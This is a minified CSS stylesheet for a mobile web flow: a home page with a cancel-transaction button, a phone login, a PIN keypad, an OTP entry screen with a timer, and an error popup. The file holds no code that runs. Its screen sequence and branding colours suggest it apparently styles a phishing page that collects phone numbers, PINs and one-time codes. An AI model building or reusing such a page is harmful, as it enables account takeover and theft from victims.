:root{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,sans-serif;line-height:1.5;font-weight:400;font-synthesis:none;text-rendering:optimizeLegibility;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}body{margin:0;padding:0;min-width:320px;min-height:100vh;background-color:#f5f5f5;color:#333}.home-container{max-width:600px;margin:0 auto;min-height:100vh;background:linear-gradient(135deg,#fff,#f8f9fa);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,sans-serif}.home-header{background:linear-gradient(135deg,#ee4d2d,#ff6b4a);padding:20px 16px;box-shadow:0 2px 8px #ee4d2d33}.logo-header{display:flex;justify-content:center;align-items:center}.logo-header img{height:40px;filter:brightness(0) invert(1)}.home-content{padding:24px 16px;display:flex;flex-direction:column;gap:32px}.info-section{text-align:center;padding:20px;background-color:#fff;border-radius:16px;box-shadow:0 2px 12px #00000014}.info-icon{display:flex;justify-content:center;margin-bottom:20px}.info-title{font-size:24px;font-weight:600;color:#333;margin-bottom:16px;line-height:1.3}.info-description{display:flex;flex-direction:column;gap:8px}.info-description p{font-size:15px;color:#666;line-height:1.5}.features-section{display:flex;flex-direction:column;gap:16px}.feature-item{display:flex;align-items:flex-start;gap:16px;padding:16px;background-color:#fff;border-radius:12px;box-shadow:0 1px 8px #0000000f;transition:transform .2s,box-shadow .2s}.feature-item:hover{transform:translateY(-2px);box-shadow:0 4px 12px #0000001a}.feature-icon{flex-shrink:0;display:flex;align-items:center;justify-content:center;width:48px;height:48px;background-color:#f8f9fa;border-radius:12px}.feature-text{flex:1}.feature-text h3{font-size:16px;font-weight:600;color:#333;margin-bottom:4px}.feature-text p{font-size:14px;color:#666;line-height:1.4}.action-section{display:flex;flex-direction:column;gap:16px;align-items:center;margin-top:8px}.cancel-transaction-button{width:100%;max-width:400px;background:linear-gradient(135deg,#ee4d2d,#ff6b4a);color:#fff;border:none;padding:16px 24px;border-radius:12px;font-size:16px;font-weight:600;cursor:pointer;display:flex;align-items:center;justify-content:center;gap:8px;box-shadow:0 4px 12px #ee4d2d4d;transition:all .3s ease}.cancel-transaction-button:hover{transform:translateY(-2px);box-shadow:0 6px 16px #ee4d2d66;background:linear-gradient(135deg,#ff6b4a,#ee4d2d)}.cancel-transaction-button:active{transform:translateY(0);box-shadow:0 2px 8px #ee4d2d4d}.help-text{font-size:14px;color:#666;text-align:center}.help-link{color:#ee4d2d;text-decoration:none;font-weight:500}.help-link:hover{text-decoration:underline}@media(max-width:480px){.info-title{font-size:20px}.info-description p{font-size:14px}.home-content{padding:20px 12px;gap:24px}.feature-text h3{font-size:15px}.feature-text p{font-size:13px}.cancel-transaction-button{font-size:15px;padding:14px 20px}}@media(min-width:601px){.home-container{border-left:1px solid #e0e0e0;border-right:1px solid #e0e0e0}}.login-container{max-width:600px;margin:0 auto;min-height:100vh;background-color:#fff;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,sans-serif}.login-header{display:flex;align-items:center;justify-content:flex-start;padding:12px 16px;border-bottom:1px solid #f0f0f0;background-color:#fff;position:sticky;top:0;z-index:10;gap:12px}.back-button,.scan-button,.help-button{background:none;border:none;padding:8px;cursor:pointer;color:#333;display:flex;align-items:center;justify-content:center}.back-button:hover,.scan-button:hover,.help-button:hover{opacity:.7}.login-title{font-size:18px;font-weight:500;color:#333;text-align:left}.login-content{padding:24px 16px;display:flex;flex-direction:column;align-items:center}.logo-container{margin-bottom:40px;margin-top:20px}.logo{width:120px;height:120px;display:flex;align-items:center;justify-content:center}.logo img{width:100%;height:100%;object-fit:contain}.phone-input-container{width:100%;display:flex;align-items:center;border:1px solid #e0e0e0;border-radius:4px;padding:12px 16px;margin-bottom:16px;background-color:#fff}.phone-input-container:focus-within{border-color:#ee4d2d}.phone-icon{margin-right:12px;display:flex;align-items:center}.phone-input{flex:1;border:none;outline:none;font-size:16px;color:#333}.phone-input::placeholder{color:#9e9e9e}.continue-button{width:100%;padding:14px;border:none;border-radius:4px;font-size:16px;font-weight:500;cursor:pointer;background-color:#f5f5f5;color:#ccc;transition:all .3s;margin-bottom:24px}.continue-button.active{background-color:#ee4d2d;color:#fff}.continue-button.active:hover{background-color:#d73211}.continue-button:disabled{cursor:not-allowed}.divider{width:100%;display:flex;align-items:center;margin:24px 0}.divider:before,.divider:after{content:"";flex:1;height:1px;background-color:#e0e0e0}.divider-text{padding:0 16px;color:#999;font-size:14px}.social-buttons{width:100%;display:flex;flex-direction:column;gap:12px;margin-bottom:24px}.social-button{width:100%;padding:12px 16px;border:1px solid #e0e0e0;border-radius:4px;background-color:#fff;display:flex;align-items:center;justify-content:center;gap:12px;font-size:15px;cursor:pointer;transition:all .2s}.social-button:hover{background-color:#f5f5f5;border-color:#ccc}.social-button.google,.social-button.facebook,.social-button.whatsapp,.social-button.passkey{color:#333}.register-link{text-align:center;font-size:14px;color:#666}.register-text{color:#666}.register-link-text{color:#1890ff;text-decoration:none;font-weight:500}.register-link-text:hover{text-decoration:underline}@media(max-width:600px){.login-container{max-width:100%}}.pin-container{max-width:600px;margin:0 auto;min-height:100vh;background-color:#fff;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,sans-serif;display:flex;flex-direction:column}.pin-header{display:flex;align-items:center;justify-content:flex-start;padding:12px 16px;border-bottom:1px solid #f0f0f0;background-color:#fff;position:sticky;top:0;z-index:10;gap:12px}.back-button{background:none;border:none;padding:8px;cursor:pointer;color:#333;display:flex;align-items:center;justify-content:center;flex-shrink:0}.back-button:hover{opacity:.7}.pin-title{font-size:18px;font-weight:500;color:#333;text-align:left;line-height:1.4}.pin-content{padding:32px 16px;display:flex;flex-direction:column;align-items:center;flex:1;justify-content:flex-start}.pin-info{text-align:center;margin-bottom:40px;width:100%}.pin-message{font-size:15px;color:#666;margin-bottom:12px;line-height:1.6}.phone-number{font-size:16px;color:#ee4d2d;font-weight:500;margin-top:8px}.pin-inputs{display:flex;gap:16px;justify-content:center;margin-bottom:48px;width:100%;max-width:400px}.pin-dot{width:16px;height:16px;border:2px solid #e0e0e0;border-radius:50%;display:flex;align-items:center;justify-content:center;transition:all .2s}.pin-dot-filled{width:12px;height:12px;background-color:#ee4d2d;border-radius:50%;animation:dotFill .2s ease-in-out}@keyframes dotFill{0%{transform:scale(0)}50%{transform:scale(1.2)}to{transform:scale(1)}}.number-pad{display:flex;flex-direction:column;gap:12px;width:100%;max-width:100%;padding:20px 16px 34px;background-color:#d4d4d4;border-radius:16px 16px 0 0;position:fixed;bottom:0;left:0;right:0;margin:0 auto;max-width:600px}.number-pad-row,.number-pad-row.last-row{display:grid;grid-template-columns:repeat(3,1fr);gap:12px;justify-content:center}.empty-space{width:100%}.number-pad-button{height:56px;border:none;border-radius:10px;background-color:#fff;font-size:30px;font-weight:400;color:#000;cursor:pointer;transition:all .1s;display:flex;align-items:center;justify-content:center;box-shadow:0 1px 2px #00000014;-webkit-tap-highlight-color:transparent}.number-pad-button:active:not(.empty){transform:scale(.97);background-color:#e8e8e8}.number-pad-button.empty{background-color:transparent;box-shadow:none;cursor:default}.number-pad-button.delete{color:#333;font-size:24px;font-weight:600}.number-pad-button.delete svg{width:30px;height:22px}.keyboard-security-badge{display:flex;align-items:center;justify-content:center;gap:6px;margin-top:12px;color:#888;font-size:13px}.keyboard-security-badge svg{width:16px;height:16px}.pin-footer{text-align:center;width:100%;margin-top:32px}.forgot-pin-button{background:none;border:none;color:#ee4d2d;font-size:15px;font-weight:500;cursor:pointer;padding:12px 16px;transition:opacity .2s}.forgot-pin-button:hover{opacity:.7}@media(max-width:600px){.pin-container{max-width:100%}.pin-title{font-size:16px}.number-pad{border-radius:16px 16px 0 0;gap:10px;padding:16px 12px}.number-pad-button{height:54px;font-size:28px;border-radius:10px}.number-pad-row{gap:10px}}@media(max-width:380px){.number-pad{gap:8px;padding:14px 10px}.number-pad-button{height:52px;font-size:26px;border-radius:8px}.number-pad-row{gap:8px}.pin-dot{width:14px;height:14px}.pin-dot-filled{width:10px;height:10px}.keyboard-security-badge{font-size:11px;margin-top:8px}.keyboard-security-badge svg{width:14px;height:14px}}*{margin:0;padding:0;box-sizing:border-box}.otp-container{max-width:600px;margin:0 auto;min-height:100vh;background-color:#fff;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,sans-serif}.otp-header{display:flex;align-items:center;justify-content:flex-start;padding:12px 16px;border-bottom:1px solid #f0f0f0;background-color:#fff;position:sticky;top:0;z-index:10;gap:12px}.back-button,.help-button{background:none;border:none;padding:8px;cursor:pointer;color:#333;display:flex;align-items:center;justify-content:center;flex-shrink:0}.back-button:hover,.help-button:hover{opacity:.7}.otp-title{font-size:16px;font-weight:500;color:#333;text-align:left;line-height:1.4}.otp-content{padding:32px 16px;display:flex;flex-direction:column;align-items:center}.otp-info{text-align:center;margin-bottom:40px;width:100%}.otp-message{font-size:15px;color:#333;margin-bottom:8px;line-height:1.6}.sms-badge{display:inline-flex;align-items:center;gap:4px;background:linear-gradient(135deg,#25d366,#1faf4d);color:#fff;padding:2px 8px;border-radius:12px;font-weight:500;font-size:14px;margin:0 2px}.sms-badge svg{width:14px;height:14px}.telegram-badge{display:inline-flex;align-items:center;gap:4px;background:linear-gradient(135deg,#25d366,#1faf4d);color:#fff;padding:2px 8px;border-radius:12px;font-weight:500;font-size:14px;margin:0 2px}.telegram-badge svg{width:14px;height:14px}.phone-number{font-size:16px;color:#25d366;font-weight:500;margin-top:8px}.otp-inputs{display:flex;gap:8px;justify-content:center;margin-bottom:32px;width:100%;max-width:380px}.otp-input{width:48px;height:56px;border:2px solid #e0e0e0;border-radius:8px;text-align:center;font-size:24px;font-weight:600;color:#333;background-color:#fff;transition:all .2s;outline:none}.otp-input:focus{border-color:#ee4d2d;background-color:#fff5f3}.otp-input:not(:placeholder-shown){border-color:#ee4d2d}.timer-container{text-align:center;width:100%}.timer-text{font-size:14px;color:#666;line-height:1.6}.timer-value{color:#ee4d2d;font-weight:600}@media(max-width:600px){.otp-container{max-width:100%}.otp-title{font-size:15px}.otp-inputs{gap:6px;max-width:100%}.otp-input{width:44px;height:52px;font-size:22px}}@media(max-width:380px){.otp-inputs{gap:4px}.otp-input{width:40px;height:48px;font-size:20px}}.error-overlay{position:fixed;inset:0;background-color:#00000080;display:flex;align-items:center;justify-content:center;z-index:1000;animation:fadeIn .2s ease-in-out}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}.error-popup{background:#fff;border-radius:16px;padding:32px 24px;max-width:360px;width:90%;text-align:center;box-shadow:0 4px 24px #00000026;animation:slideUp .3s ease-out}@keyframes slideUp{0%{transform:translateY(20px);opacity:0}to{transform:translateY(0);opacity:1}}.error-icon{display:flex;justify-content:center;margin-bottom:20px;animation:shake .5s ease-in-out}@keyframes shake{0%,to{transform:translate(0)}10%,30%,50%,70%,90%{transform:translate(-5px)}20%,40%,60%,80%{transform:translate(5px)}}.error-title{font-size:20px;font-weight:600;color:#333;margin-bottom:12px}.error-message{font-size:15px;color:#666;line-height:1.6;margin-bottom:24px}.error-button{width:100%;padding:14px;background-color:#ee4d2d;color:#fff;border:none;border-radius:8px;font-size:16px;font-weight:600;cursor:pointer;transition:background-color .2s}.error-button:hover{background-color:#d63916}.error-button:active{transform:scale(.98)}#root{width:100%;margin:0;padding:0}
